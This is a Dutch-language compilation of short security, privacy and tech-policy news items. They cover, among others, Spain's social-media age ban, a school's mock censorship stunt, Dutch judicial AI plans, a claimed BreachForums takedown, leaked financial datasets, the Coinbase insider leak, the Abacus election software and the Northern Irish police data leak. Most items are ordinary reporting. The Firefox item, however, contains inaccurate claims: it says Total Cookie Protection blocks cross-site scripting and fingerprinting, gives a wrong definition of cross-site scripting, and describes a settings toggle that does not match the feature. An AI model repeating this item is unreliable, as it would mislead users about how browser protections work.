Premier Sanchez wil ook de wet aanpassen zodat leidinggevenden van socialmediaplatforms vervolgd kunnen worden voor overtredingen op hun platform als ze illegale content of "haatzaaiende uitingen" niet verwijderen. De Spaanse premier claimt dat de maatregelen minderjarigen moeten beschermen en de controle over socialmediaplatforms moeten versterken.

Spanje heeft zich aangesloten bij de "Digital Readiness Coalition", samen met vijf andere landen. Deze landen willen socialmediaplatforms strenger, sneller en effectiever reguleren. De wetsvoorstellen voor het Spaanse socialmediaverbod worden volgende week gepresenteerd. Eerder besloot Australië al een socialmediaverbod in te voeren. Ook het Verenigd Koninkrijk en Frankrijk zijn hiermee bezig. Het nieuwe Nederlandse kabinet maakte vorige week bekend dat er een Europese minimumleeftijd van 15 jaar voor sociale media moet komen, evenals "privacyvriendelijke leeftijdsverificatie" voor jongeren.
Bron

Mozilla heeft een nieuwe functie toegevoegd aan Firefox waarmee gebruikers met één klik alle trackers kunnen blokkeren. Deze functie, genaamd "Total Cookie Protection", is ontworpen om te voorkomen dat websites gebruikers volgen over het web. De functie is standaard ingeschakeld in de nieuwste versie van Firefox en kan worden aangepast in de privacy-instellingen.

Total Cookie Protection werkt door een aparte "cookie jar" te creëren voor elke website die een gebruiker bezoekt. Dit betekent dat cookies die door de ene website worden geplaatst, niet kunnen worden gelezen door andere websites. Dit maakt het voor trackers moeilijker om gebruikers te volgen over het web, omdat ze niet langer kunnen vertrouwen op cookies om gebruikers te identificeren. Naast het blokkeren van cookies, blokkeert Total Cookie Protection ook andere trackingtechnieken, zoals browser fingerprinting en cross-site scripting. Browser fingerprinting is een techniek die wordt gebruikt om gebruikers te identificeren op basis van hun browserinstellingen, zoals hun besturingssysteem, browserversie en geïnstalleerde plug-ins. Cross-site scripting is een techniek die wordt gebruikt om code uit te voeren op de computer van een gebruiker wanneer ze een website bezoeken.

Mozilla zegt dat Total Cookie Protection een belangrijke stap is in de richting van meer privacy voor gebruikers. Het bedrijf zegt dat het van plan is om in de toekomst nog meer privacyfuncties aan Firefox toe te voegen. De functie is een antwoord op de groeiende bezorgdheid over online privacy. Veel gebruikers zijn zich niet bewust van de hoeveelheid data die over hen wordt verzameld en hoe deze data wordt gebruikt. Total Cookie Protection geeft gebruikers meer controle over hun privacy door hen in staat te stellen om trackers met één klik te blokkeren.

De nieuwe functie is beschikbaar in de nieuwste versie van Firefox voor desktop en mobiel. Gebruikers kunnen de functie inschakelen door naar de privacy-instellingen van Firefox te gaan en "Total Cookie Protection" te selecteren. Mozilla raadt gebruikers aan om de functie in te schakelen om hun privacy te beschermen.
Bron

Het College Paters Jozefieten in Melle heeft een ludieke actie opgezet om leerlingen bewust te maken van censuur. Leerlingen ontvingen via Smartschool een bericht waarin stond dat het woord '6 7' verboden was, omdat het "niet past binnen de christelijke traditie". Deze actie bleek een poging van de leraren godsdienst om de leerlingen te laten ervaren wat censuur betekent.

Het bericht, dat gisterenavond werd verstuurd, stelde dat het woord '6 7' niet langer mocht worden uitgesproken op school, noch tijdens de lessen, noch op de speelplaats of in andere schoolcontexten. De redenen die werden gegeven, waren dat de getallen 6 en 7 elk een sterke symbolische en spirituele betekenis hebben binnen het christelijk geloof, en dat het lichtzinnig combineren en gebruiken ervan haaks staat op de waarden van respect, bezinning en geloof die de school wil uitdragen.

De mail lokte diverse reacties uit, zelfs van andere leraren die nog niet alle mails hadden gecheckt, aldus directeur Nico De Rijcke. De actie is bedoeld om leerlingen te laten ondervinden wat censuur inhoudt, omdat sommige jongeren in de wereld vervolgd worden voor simpele uitspraken. Volgende week vrijdag neemt de school deel aan schrijf-ze-vrijdag, een actie van Amnesty International waarbij leerlingen brieven schrijven aan overheden die mensen gevangenhouden vanwege censuur.

De directeur geeft aan dat de actie zijn doel niet heeft gemist, mede doordat het nieuws de media heeft bereikt. Hij benadrukt dat het woord '6 7', dat in 2025 werd verkozen tot kinder- én jongerenwoord van het jaar, enorm leeft onder de jongeren. Leerlingen Lot en Nora uit het vierde middelbaar gaven aan dat ze meteen dachten dat het om een grap ging, maar niet hadden verwacht dat er zo'n boodschap achter zou zitten. Ze vragen zich wel af of er betere manieren zijn om over censuur te leren. Leerling Leon merkte op dat het woord, dat hij eigenlijk amper nog gebruikte, sinds de mail weer voortdurend te horen is. Directeur De Rijcke staat achter de actie en wil dergelijke initiatieven blijven omarmen. Bron

Cloud-uitval kan ernstige gevolgen hebben voor bedrijven, zo blijkt uit een recent rapport. De complexiteit van cloud-infrastructuren maakt het lastig om de impact van een verstoring te voorspellen. Een uitval kan zich snel verspreiden en een cascade van problemen veroorzaken, waardoor essentiële diensten onbereikbaar worden.

Het rapport benadrukt dat veel organisaties niet volledig voorbereid zijn op dergelijke scenario's. Het gebrek aan inzicht in de onderlinge afhankelijkheden van cloud-componenten bemoeilijkt het herstelproces. Wanneer een cruciale service uitvalt, kan dit leiden tot een domino-effect, waarbij andere services die afhankelijk zijn van de getroffen component eveneens uitvallen.

Een ander belangrijk punt is de rol van menselijke fouten. Vaak zijn verkeerde configuraties of onjuiste implementaties de oorzaak van cloud-problemen. Automatisering en monitoring kunnen helpen om deze risico's te verminderen, maar vereisen wel de juiste expertise en implementatie.

De onderzoekers adviseren bedrijven om hun cloud-infrastructuren grondig te analyseren en de potentiële impact van uitvalscenario's in kaart te brengen. Regelmatige tests en simulaties kunnen helpen om de respons op incidenten te verbeteren en de hersteltijd te verkorten. Daarnaast is het van belang om te investeren in training en opleiding van personeel, zodat zij in staat zijn om problemen snel te identificeren en op te lossen.

Het rapport concludeert dat een proactieve benadering van cloud-beveiliging en -resilience essentieel is om de continuïteit van bedrijfsprocessen te waarborgen. Organisaties moeten zich bewust zijn van de risico's en maatregelen nemen om de impact van cloud-uitval te minimaliseren.

De Rechtspraak is van plan om dit jaar daadwerkelijk artificial intelligence (AI) te gaan toepassen om het werk van medewerkers efficiënter en effectiever te maken. Dit blijkt uit het vandaag verschenen Jaarplan 2026 van de organisatie. Vorig jaar presenteerde de Rechtspraak al een strategie voor het gebruik van AI binnen de rechtspraak en startte het een landelijk programma hiervoor. Daarnaast is er een interne variant van ChatGPT ontwikkeld, genaamd RechtspraakGPT.

Volgens het Jaarplan verwacht de samenleving meer van de rechtspraak, terwijl de werkdruk toeneemt en er minder personeel beschikbaar is. Om deze druk het hoofd te bieden en tegelijkertijd de kwaliteit te blijven leveren en burgers beter te bedienen, is een nieuwe manier van werken noodzakelijk. Naast digitalisering kan AI hierbij een belangrijke rol spelen.

Als voorbeelden van AI-toepassingen worden het genereren, samenvatten en vertalen van teksten genoemd. AI is echter niet alleen een hulpmiddel, maar speelt ook een steeds grotere rol in de rechtspraktijk zelf. Zo worden pleidooien soms met AI gemaakt en worden opsporingstechnieken steeds vaker ondersteund door AI. Dit roept belangrijke vragen op over hoe bewijsmateriaal wordt gebruikt en welke rol advocaten en rechters spelen.

De Rechtspraak heeft vorig jaar al regels en beleid opgesteld voor het gebruik van AI. Dit jaar wil de Rechtspraak AI daadwerkelijk gaan toepassen in het werk van medewerkers, bijvoorbeeld door spraak-naar-tekst-technologie, het automatisch genereren van programmaregels voor ontwikkelaars en het slimmer verdelen van zaken. Ook start de Rechtspraak een experiment om te onderzoeken of AI kan worden ingezet door rechters om tot een oordeel te komen.

Uit onderzoek van het ministerie van Justitie en Veiligheid blijkt dat Nederlanders financiële schade als het ernstigste kenmerk van cybercriminaliteit beschouwen. Meer dan tweeduizend Nederlanders namen deel aan de Najaarsmeting 2025 van de JenV Monitor, waarbij ze werden gevraagd naar onderwerpen binnen het werkveld van het ministerie, waaronder cybercrime.

Op de vraag wat het ernstigste kenmerk van cybercriminaliteit is, antwoordde 51 procent financiële schade. De lage pakkans werd door 45 procent genoemd, terwijl 28 procent het steeds vaker voorkomen van cybercrime als het ernstigste kenmerk zag. Voor 26 procent was het lastige om zichzelf tegen cybercrime te beschermen het belangrijkste kenmerk. De deelnemers konden twee kenmerken selecteren uit een totaal van zes.

Daarnaast is bijna de helft van de deelnemers (48 procent) van mening dat politie en justitie momenteel slecht in staat zijn om cybercrime terug te dringen. Slechts een minderheid van één op de tien denkt dat politie en justitie hier (zeer) goed toe in staat zijn. Drie op de tien deelnemers nemen een neutraal standpunt in.

Op de vraag over welke thema's men beter geïnformeerd wil worden door het ministerie van Justitie en Veiligheid, staat cybercrime op de derde plek. De JenV Monitor vindt twee keer per jaar plaats, in het voor- en najaar.

Binnen de leiding van cybersecurity bestaat vaak het idee dat het toevoegen van extra personeel, zoals meer analisten en extra diensten, de oplossing is voor toenemende drukte en ruis op de afdeling. Hoewel dit daadkrachtig oogt, blijkt inefficiëntie binnen een Security Operations Center zelden een direct gevolg van een personeelstekort. Het fundamentele probleem ligt veelal bij de verwerking van signalen. Beveiligingsteams in diverse sectoren staan onder druk omdat zij, ondanks de aanwezigheid van talent, vaak geen toegang hebben tot tijdige en direct toepasbare dreigingsinformatie. In een arbeidsmarkt met tekorten is het louter aannemen van meer mensen niet altijd de effectiefste strategie om incidenten te voorkomen.

Een strategische benadering richt zich op de kwaliteit van inlichtingen in plaats van de kwantiteit van medewerkers. Door te investeren in hoogwaardige en actuele dreigingsinformatie kunnen bestaande teams sneller en met meer zekerheid opereren. Een veelvoorkomend probleem is de overvloed aan meldingen uit systemen zoals SIEMs, EDRs en netwerkdetectie, waardoor analisten veel tijd kwijt zijn aan het scheiden van relevante signalen en ruis. Het toevoegen van meer analisten leidt in deze situatie slechts tot meer personen die dezelfde hoeveelheid irrelevante meldingen verwerken, zonder dat de oorzaak van de overbelasting wordt weggenomen.

Daarnaast vormt de snelheid van detectie een cruciaal aandachtspunt, aangezien de tijd die verstrijkt voordat een dreiging wordt opgemerkt, directe invloed heeft op de herstelkosten en de impact op de bedrijfsvoering. De snelheid van detectie wordt beperkt door de versheid van de beschikbare data, niet door het aantal analisten. Een team dat werkt met verouderde inlichtingen zal aanvallen later detecteren dan een team dat beschikt over actuele context. Het gebruik van recente Indicators of Compromise, gebaseerd op waargenomen gedrag in actieve aanvallen, stelt beveiligingstools in staat om dreigingen in een vroeger stadium te herkennen en incidenten te stoppen voordat deze escaleren.

Minister van Binnenlandse Zaken Bernard Quintin (MR) heeft aangekondigd dat hij het aantal noodnummers in België wil terugbrengen tot twee. Het plan is om 112 te reserveren voor dringende hulpverzoeken aan medische bijstand, brandweer of politie. Voor niet-dringende oproepen wil de minister één centraal nummer in het leven roepen.

Momenteel is de situatie voor niet-dringende oproepen minder overzichtelijk. Burgers kunnen de politie bereiken via het nummer 101, stormschade melden via 1722, en niet-dringende medische hulp vragen via 1733. Sommige politiezones hebben daarnaast ook nog een blauwe lijn voor niet-dringende vragen en meldingen.

Minister Quintin heeft zijn administratie de opdracht gegeven te onderzoeken hoe het aantal noodnummers gereduceerd kan worden. Het doel is om burgers meer duidelijkheid te bieden en de werklast bij de noodcentrales te verlichten, waar momenteel ook veel niet-dringende oproepen binnenkomen. De aankondiging werd gedaan in de Kamercommissie Binnenlandse Zaken. Bron

Op 4 februari 2026 is waargenomen dat de actor HasanBroker de verantwoordelijkheid heeft opgeëist voor het neerhalen van BreachForums. Deze actie maakt deel uit van een operatie die de naam OpVictoria draagt. De actor stelt kwetsbaarheden op het gebied van SQL-injectie, Cross-Site Scripting en Server-Side Request Forgery te hebben uitgebuit om toegang te krijgen tot de systemen.

Door deze handelingen werd de oorspronkelijke server blootgesteld en de dienstverlening verstoord, mede door het uitvoeren van DDoS-aanvallen. De operatie eindigde naar verluidt met massale misbruikmeldingen richting de registrar, wat ICANN ertoe bewoog het domein op te schorten. Bij dit incident zijn geen vertrouwelijke of bedrijfseigen gegevens gedownload, gekopieerd of verder verspreid.

De groepering Scattered LAPSUS$ Hunters, ook bekend onder de naam Scattered Spider, verspreidt berichten waarin financiële beloningen in het vooruitzicht worden gesteld aan individuen die bereid zijn reeds getroffen organisaties lastig te vallen. Deze oproep richt zich specifiek op slachtoffers die weigeren in te gaan op de eisen van de cybercriminelen of die communicatie afhouden. De gevraagde intimidatiepraktijken omvatten het bestoken van doelwitten via e-mail, sms-berichten en het overspoelen van telefoonlijnen om de druk op de organisaties verder op te voeren.

Een dreigingsactor heeft drie afzonderlijke datasets online aangeboden die een aanzienlijke hoeveelheid persoonlijke en financiële informatie bevatten. De grootste dataset betreft naar verluidt 171 miljoen rijen met ontdubbelde kaarthoudergegevens van China UnionPay. De blootgestelde informatie in deze set omvat telefoonnummers, namen, nationale identiteitsbewijzen, provincies, informatie over telecomproviders en geboortedata.

Naast de bankgegevens is er een omvangrijke bundel met cryptovalutagegevens gepubliceerd. Het gaat om een compilatie van 3,7 gigabyte die in totaal 21,2 miljoen records bevat. Deze gegevens zijn afkomstig van tientallen grote handelsplatforms, waaronder Coinbase, Binance, KuCoin, Poloniex, Bitfinex en Paxful. De inhoud van deze dataset bestaat uit combinatie-inloggegevens, e-mail leads en klantgegevens die gekoppeld zijn aan telefoonnummers.

De derde publicatie betreft 920.000 unieke rijen die afkomstig zouden zijn van het investeringsplatform van KGI Asia. Deze specifieke dataset bevat e-mailadressen, telefoonnummers, aandelennamen, handelsvolumes en transactiebedragen. De gegevens in deze laatste set zijn recent en dateren van februari 2025.

Cryptobeurs Coinbase heeft bevestigd dat een medewerker ongeautoriseerd toegang heeft verkregen tot de gegevens van ongeveer dertig klanten. Het securityteam van Coinbase ontdekte dit incident vorig jaar. De betreffende medewerker is inmiddels niet meer werkzaam voor het bedrijf. Het datalek staat los van een eerder incident in januari 2025, waarbij gegevens van bijna 70.000 klanten werden gelekt door omgekochte medewerkers van een extern bedrijf.
De aanleiding voor het onderzoek was de publicatie van screenshots van een interne Coinbase support interface op Telegram door de groep Scattered Lapsus Hunters (SLH). De screenshots, die kort na publicatie weer werden verwijderd, toonden een support panel dat toegang gaf tot klantinformatie, waaronder e-mailadressen, namen, geboortedata, telefoonnummers, KYC-informatie (Know Your Customer), cryptocurrency wallet saldi en transacties. Het is echter onduidelijk of SLH direct betrokken was bij het insider-datalek.
Coinbase heeft de getroffen klanten vorig jaar op de hoogte gesteld van het incident en diensten aangeboden ter bescherming tegen identiteitsdiefstal. Ook is melding gemaakt bij de relevante toezichthouders.
De afgelopen jaren zijn Business Process Outsourcing (BPO)-bedrijven steeds vaker doelwit van dreigingsactoren die toegang zoeken tot klantgegevens, interne tools of bedrijfsnetwerken. BPO-medewerkers hebben vaak toegang tot gevoelige interne systemen en klantinformatie, wat ze een waardevol doelwit maakt voor aanvallers. Een bekende tactiek is het omkopen van medewerkers om klantinformatie te stelen of te delen. Scattered Lapsus Hunters claimde eerder een insider bij CrowdStrike te hebben omgekocht om screenshots van interne applicaties te delen.
Bron

Veertien gemeenten in Nederland zullen tijdens de komende gemeenteraadsverkiezingen in maart 2026 de nieuwe verkiezingssoftware Abacus gebruiken. Dit heeft de Kiesraad op 4 februari 2026 bekendgemaakt. De door de Kiesraad ontwikkelde Abacus-software is bedoeld om de verkiezingsuitslagen te berekenen. Momenteel wordt voor de kandidaatstelling en de berekening van de uitslag nog Ondersteunende Software Verkiezingen (OSV2020) gebruikt.

Abacus is bedoeld om op termijn de module Uitslagvaststelling van OSV2020 te vervangen. Het is nog niet bekend wanneer dit precies zal gebeuren. De Kiesraad geeft aan dat de geleidelijke inzet van Abacus de mogelijkheid biedt om de introductie goed te begeleiden en lessen te trekken uit het gebruik van de software in de praktijk. Onder andere de gemeenten Amersfoort, Doetinchem, Groningen, Leiden, ’s Hertogenbosch, Utrecht en Zoetermeer zullen Abacus volgende maand gebruiken.

De broncode van Abacus is open source en beschikbaar via GitHub. Volgens de Kiesraad hebben enthousiaste ontwikkelaars van buiten de Kiesraad tips en verbeterpunten aangedragen, wat de kwaliteit van de software ten goede komt. Abacus wordt op dezelfde manier getest als de bestaande OSV2020-software, namelijk met een penetratietest en een toets op de wettelijke kaders. Bron

De Algemene Rekenkamer waarschuwt dat de rijksoverheid zich onvoldoende voorbereidt op de dreiging van quantumcomputers, die een risico vormen voor vertrouwelijke informatie en vitale infrastructuur. Uit onderzoek blijkt dat 71 procent van de Rijksoverheidsorganisaties nog geen voorbereidingen treft. Hoewel quantumtechnologie nu nog grotendeels toekomstmuziek is, kunnen de gevolgen groot zijn als buitenlandse overheden met quantumcomputers versleutelingstechnieken kunnen kraken.

De Rekenkamer stelt dat het kraken van versleuteling door quantumcomputers kan leiden tot het blootleggen van gevoelige informatie, het ontregelen van verkeer en het blokkeren van toegang tot systemen, wat maatschappelijke ontwrichting tot gevolg kan hebben. Om dit te voorkomen is post-quantumcryptografie (PQC) nodig, een versleuteling die bestand is tegen quantumcomputers.

Een gebrek aan capaciteit, expertise en urgentie, mede doordat het onduidelijk is wanneer quantumcomputers daadwerkelijk een bedreiging vormen, wordt door de Rekenkamer genoemd als reden waarom de meeste Rijksorganisaties niet bezig zijn met PQC. De AIVD schat echter dat 'Q-Day', de dag waarop kwaadwillenden met quantumcomputers hedendaagse cryptografie kunnen kraken, al in 2030 kan plaatsvinden.

Het ministerie van Economische Zaken werkt aan een rijksbrede quantumstrategie, maar de Rekenkamer benadrukt dat concrete doelen, acties en budgetten nog ontbreken. Het demissionaire kabinet erkent de bevindingen van de Rekenkamer en de noodzaak om te starten met de migratie naar PQC. Minister Karremans van Economische Zaken noemt de migratie naar PQC noodzakelijk voor de veiligheid, betrouwbaarheid en beschikbaarheid van de rijksoverheid.

De migratie naar PQC blijkt complex door afhankelijkheden binnen organisaties en in de toeleveringsketen. Er is vaak een gebrek aan ervaring en expertise om dit thema voortvarend op te pakken. Het kabinet werkt aan een rijksbrede quantumstrategie, die naar verwachting in het tweede kwartaal van dit jaar zal verschijnen. Bron

De Noord-Ierse politie keert een vergoeding van 8700 euro uit aan duizenden agenten die slachtoffer zijn geworden van een ernstig datalek. In totaal is een bedrag van 138 miljoen euro gereserveerd voor de uitbetaling van de vergoedingen. Eerder werd de politie al beboet met 890.000 euro door de Britse privacytoezichthouder ICO. De oorspronkelijke boete zou 6,6 miljoen euro bedragen, maar werd verlaagd omdat het om een publieke sector organisatie gaat.

Het datalek vond plaats in 2023, toen een spreadsheet met de initialen en achternamen van alle Noord-Ierse politiemedewerkers, hun locatie en afdeling openbaar werd gemaakt via een Freedom of Information Request. Deze informatie bevond zich in een verborgen tabblad. Hoewel de spreadsheet na ontdekking van de fout direct offline werd gehaald, was deze al door meerdere partijen gedownload. De gelekte gegevens betroffen bijna tienduizend politieagenten en -medewerkers.

De gelekte data omvatte achternamen en voorletters, functie, rang, afdeling, werklocatie, contracttype, geslacht en dienst- en personeelsnummer. Uit een onderzoek van de Noord-Ierse politie bleek dat het datalek grote gevolgen had voor de betrokkenen. Zo wilden meerdere agenten hun naam wijzigen, meldden meer dan vijftig agenten zich ziek en nam één agent ontslag. De Britse privacytoezichthouder sprak van een ongekend datalek, waarbij agenten vreesden voor hun leven.

De ICO concludeerde na onderzoek dat de interne procedures en protocollen voor het vrijgeven van informatie bij de Noord-Ierse politie tekortschoten. John Edwards, de Britse Informatiecommissaris, benadrukte dat eenvoudig te implementeren beleid en procedures dit potentieel levensbedreigende incident hadden kunnen voorkomen. Een Freedom of Information Request is de Britse variant van de Nederlandse Wet open overheid (Woo).

Liam Kelly, voorzitter van de Police Federation for Northern Ireland, noemde het datalek een zeer kostbare fout. Hij gaf aan dat veel agenten zich extreem kwetsbaar voelden door de vrijgegeven informatie en dat sommigen zijn verhuisd of uitgebreide beveiligingssystemen hebben geïnstalleerd om zichzelf en hun gezinnen te beschermen. Kelly beschouwt de vergoeding als een welkome afsluiting, maar erkent dat het datalek voor sommige agenten langdurige gevolgen zal hebben. Bron

De Europese Commissie evalueert een interne communicatietool gebaseerd op het Matrix-protocol, dat end-to-end versleutelde communicatie mogelijk maakt. Momenteel gebruikt de Commissie Microsoft Teams als primaire tool en Signal als back-up. Een EU-functionaris gaf afgelopen oktober tijdens The Matrix Conference aan dat Signal voor een organisatie van de omvang van de Europese Commissie niet flexibel genoeg zou zijn.

Een woordvoerder van de Europese Commissie verklaarde tegenover Euractiv dat de test deel uitmaakt van de inspanningen om meer soevereine digitale oplossingen te gebruiken. Brussel wil onderzoeken of Matrix als aanvulling en back-up kan dienen voor de bestaande interne communicatiesoftware. Er zijn momenteel geen plannen om Microsoft Teams te vervangen door de Matrix-oplossing.

Het Matrix-protocol is decentraal en gefedereerd, in tegenstelling tot Signal, waarvan de servers ondergebracht zijn bij AWS in de Verenigde Staten. In 2020 koos de Europese Commissie Signal als aanbevolen chat-app. Bron

Fontys Hogeschool heeft docenten verboden om studentgegevens te uploaden naar ChatGPT. De reactie van de onderwijsinstelling volgde op vragen van Omroep Brabant over een Fontys-docent die collega’s had aangespoord om persoonlijke gegevens van studenten naar ChatGPT te uploaden. De docent had een tool ontwikkeld om studentenportfolio’s te analyseren en doorzoekbaar te maken, en gaf aan dat hij de tool met echte portfolio's had getest.

De docent had aanvankelijk verklaard dat de tool lokaal draaide, maar dit bleek niet het geval. De tool draaide op servers van OpenAI, wat volgens de docent zelf een privacyprobleem vormt. De tool draait inmiddels volledig lokaal en de docent stelt dat er geen studentgegevens zijn geüpload, enkel zijn eigen portfolio's. "Ik ben zelf ook student", aldus de docent.

Fontys laat weten dat er binnen de onderwijsinstelling geëxperimenteerd wordt met AI, maar dat het uploaden van studentgegevens naar OpenAI niet is toegestaan. De onderwijsinstelling is ervan overtuigd dat er geen echte studentgegevens zijn geüpload, maar dat het slechts om een 'testportfolio' zonder persoonsgegevens van echte studenten zou gaan. Fontys heeft dit niet zelf kunnen controleren, maar zegt de docent te geloven.

Professor Johan Jeuring van de Universiteit Utrecht stelt dat het gebruik van OpenAI voor dit soort toepassingen wettelijk verboden is. "Soms vind ik de AVG overdreven streng, maar in dit geval niet”, aldus de professor. Portfolio's bevatten persoonlijke gegevens en het is onbekend wat OpenAI met de informatie doet of kan doen. "Je kunt OpenAI simpelweg niet vertrouwen." Bron

Software en diensten van Google en Microsoft hebben een dominante positie verworven in het Nederlandse funderend onderwijs. Demissionair staatssecretaris Becking van Onderwijs waarschuwt in een brief aan de Tweede Kamer dat dit de publieke waarden zoals privacy en autonomie in het gedrang brengt, en vendor- en data lock-ins veroorzaakt. Volgens Becking bestaan er momenteel geen één-op-één alternatieven voor de totaaloplossingen die de Amerikaanse techbedrijven bieden.

Uit onderzoek in opdracht van Becking blijkt dat Google Workspace door het merendeel van de schoolbesturen wordt gebruikt voor het primaire onderwijsproces, terwijl vrijwel elk schoolbestuur Microsoft 365 gebruikt voor het secundaire proces. Schoolbesturen hebben tegenover de onderzoekers hun afhankelijkheid van Google en Microsoft bevestigd. Ze gaven aan dat het, gezien de focus op kwaliteit en prijs bij inkoop en de beperkte kennis, kunde en capaciteit, onwaarschijnlijk is dat ze zelfstandig overstappen op alternatieve diensten.

De staatssecretaris merkt op dat de afhankelijkheden vooral spelen bij gegevensopslag in de cloud en bij platforms die samenwerking en het uitwisselen van bestanden mogelijk maken. Hij stelt dat de afhankelijkheden complex zijn en dat de oplossing de mogelijkheden van het funderend onderwijs overstijgt. Samenwerking tussen onderwijssectoren, op nationaal niveau en in EU-verband, is noodzakelijk, en handelingsperspectieven op langere termijn vereisen nieuw beleid en bijbehorende financiering.

Becking acht het belangrijk om nu al te doen wat mogelijk is. De eerste stappen op korte termijn liggen op het terrein van het stimuleren van bewustwording over afhankelijkheden van grote techbedrijven en het stimuleren van alternatieven. Vorig jaar is een pilot gestart met het Open Source Program Office (OSPO), dat schoolbesturen moet ondersteunen om bewuste keuzes te maken tussen alternatieven, inzicht te krijgen in maatregelen die nodig zijn om continuïteit en privacy te borgen, en in de gevolgen als producten van grote techbedrijven niet meer beschikbaar zijn. De subsidie voor het OSPO is verlengd om de aanbevelingen van de onderzoekers uit te werken. Schoolbesturen die aan de slag willen met alternatieven voor grote techbedrijven, kunnen bij het OSPO terecht voor ondersteuning. Bron, 2

De Autoriteit Persoonsgegevens (AP) heeft haar zorgen geuit over de snelle implementatie van generatieve AI door organisaties, zonder voldoende aandacht voor de gevolgen voor mens en maatschappij. De privacytoezichthouder waarschuwt dat het gebruik van generatieve AI leidt tot een ongekend snelle centralisatie van gevoelige data. De AP stelt dat er stevige vangrails nodig zijn en publiceerde vandaag een visie op generatieve AI.

De AP benadrukt dat de impact van generatieve AI steeds duidelijker wordt, mede door de snelle opkomst van applicaties, vaak afkomstig van Amerikaanse techbedrijven. Dit vergroot de Europese afhankelijkheid en zet de digitale autonomie onder druk, in een context van geopolitieke verschuivingen waarbij economische integratie als drukmiddel wordt ingezet, aldus de AP.

Hoewel modellen uitvoerig worden getest voordat ze op de markt komen, kunnen de risico's en incidenten zich juist in de praktijk manifesteren. Het gebruik van generatieve AI gaat gepaard met de verwerking van grote hoeveelheden data, wat gebruikers afhankelijk en kwetsbaar kan maken. De AP merkt op dat mensen chatbots steeds vaker als enige informatiebron gebruiken, wat zorgelijk is omdat organisaties generatieve AI vaak te snel inzetten.

De AP signaleert dat door het gebruik van generatieve AI een snelle centralisatie van gevoelige data plaatsvindt. AI-aanbieders beschikken over grote hoeveelheden data, waarvan een aanzienlijk deel als gevoelig wordt geclassificeerd. Ongeveer elf procent van de berichten wordt geclassificeerd als 'expressing', wat het uiten van gedachten of gevoelens zonder directe actie of vraag inhoudt.

De AP stelt verder dat het gebruik van generatieve AI gecentraliseerd is bij een klein aantal aanbieders, waardoor technologische afhankelijkheid wordt ingezet als drukmiddel. De EU kan bij een te grote afhankelijkheid van buitenaf onvoldoende sturen op verantwoord gebruik. De toezichthouder pleit voor "stevige vangrails" om een "wilde Westen-scenario" te voorkomen.

AP-voorzitter Aleid Wolfsen stelt dat het razendsnel integreren van generatieve AI in onderwijs, zorg, media en bestuur zonder een gedeeld normatief kader leidt tot een maatschappelijk experiment zonder protocol. De AP pleit voor de ontwikkeling en inzet van "waardengedreven generatieve AI", waarbij ruimte is voor innovatie, met bescherming van democratie, grondrechten en onderling vertrouwen. Bron

Verschillende burgerrechtenbewegingen, waaronder Amnesty International en Bits of Freedom, uiten hun zorgen over een Zwitsers voorstel dat de bewaarplicht in het land uitbreidt en bijna alle online serviceproviders verplicht om hun gebruikers te identificeren. De organisaties stellen dat het voorstel een schending is van de fundamentele rechten op privacy en databescherming. Proton, een Zwitserse provider, heeft eerder al gedreigd Zwitserland te verlaten als de surveillancewet wordt aangenomen.

De voorgestelde verordening breidt de verplichting voor communicatieproviders om metadata op te slaan verder uit. Ook worden nagenoeg alle serviceproviders, waaronder vpn-diensten, verplicht om hun klanten te identificeren. Volgens de burgerrechtenbewegingen is het niet anoniem en vrij kunnen communiceren zonder overheidsbemoeienis een inbreuk op de vrijheid van meningsuiting, gedachte en vereniging. In totaal hebben negentien organisaties de open brief ondertekend.

De organisaties waarschuwen dat de verordening risico's met zich meebrengt op het gebied van cybersecurity. Een verplichting voor bijna alle internetproviders om gevoelige data van al hun gebruikers op te slaan, zorgt voor grote beveiligingsrisico's. Aanvallers zouden de opgeslagen data kunnen stelen, wat kan leiden tot gevoelige datalekken.

De burgerrechtenbewegingen stellen dat er minder ingrijpende alternatieven voorhanden zijn. Een gerechtelijk uitgevaardigd bewaarbevel maakt het mogelijk om relevante data veilig te stellen, zonder de gehele bevolking bloot te stellen aan massasurveillance. De organisaties roepen de Zwitserse autoriteiten in een open brief op om het voorstel in te trekken. Naast Amnesty International en Bits of Freedom is de brief onder andere ondertekend door European Digital Rights (EDRi), Human Rights Watch, Internet Society, Liga voor Mensenrechten en Privacy International. Bron

Demissionair minister Hermans van Klimaat heeft verklaard dat een Chinese meetsensor in Nederlandse slimme meters geen killswitch bevat. Dit antwoord kwam naar aanleiding van Kamervragen van JA21 over de gunning van een opdracht voor deze sensoren aan onder meer het Chinese Kaifa Technology, waarin het staatsbedrijf China Electronics Corporation een meerderheidsbelang heeft. De regionale netbeheerders Alliander, Enexis en Stedin hebben deze opdracht gegund.

JA21-Kamerlid Van den Berg vroeg of de minister kon uitsluiten dat via de sensoren manipulatie van meetwaarden, aanvallen op de toeleveringsketen of ongeautoriseerde toegang tot meterdata mogelijk is. Minister Hermans antwoordde dat de verzending en versleuteling van data naar de netbeheerders en de communicatie met andere apparaten niet via deze meetmodule verloopt. Tevens stelde zij dat de meetmodule geen schakelaar bevat en niet op afstand kan worden uitgeschakeld, waardoor er geen effect is op de beschikbaarheid van energie.

Volgens de minister kunnen de leverancier van de sensor en andere niet-geautoriseerde partijen niet meelezen met de data van de nieuwe generatie slimme meter. De veiligheid van de data wordt door de netbeheerders gewaarborgd door encryptie en autorisaties. Het kabinet is van oordeel dat de betreffende inkoop geen ontoelaatbaar risico vormt voor Nederlandse consumenten.

Voorafgaand aan de opdrachtverstrekking hebben de netbeheerders een risicoanalyse uitgevoerd. Deze analyse omvatte risico's met betrekking tot cyber, energieleveringszekerheid (zoals beïnvloeding op afstand) en ongeautoriseerde toegang tot meterdata. Voor componenten die niet als risicovol werden beschouwd, is gekozen voor maximale concurrentie om de maatschappelijke kosten zo laag mogelijk te houden.

Burgers zijn niet verplicht een slimme meter te accepteren waarvan de risico’s niet transparant zijn beoordeeld. Bij de vervanging van de laatste analoge meters wordt dit jaar en volgend jaar nog de huidige (5e generatie) slimme meter aangeboden en nog niet de nieuwe meter, aangezien de bestaande voorraad naar verwachting strekt tot in het najaar van 2027. Burgers kunnen de vervanging van een oude analoge meter niet meer weigeren, maar er zijn wel twee alternatieven als iemand bezwaar heeft tegen het op afstand uitlezen van de meter. De communicatiefunctionaliteit van de slimme meter kan op verzoek van de afnemer worden uitgezet, of er kan worden gekozen voor een digitale meter waarbij de meterstanden zelf moeten worden doorgegeven aan de energieleverancier. Bron

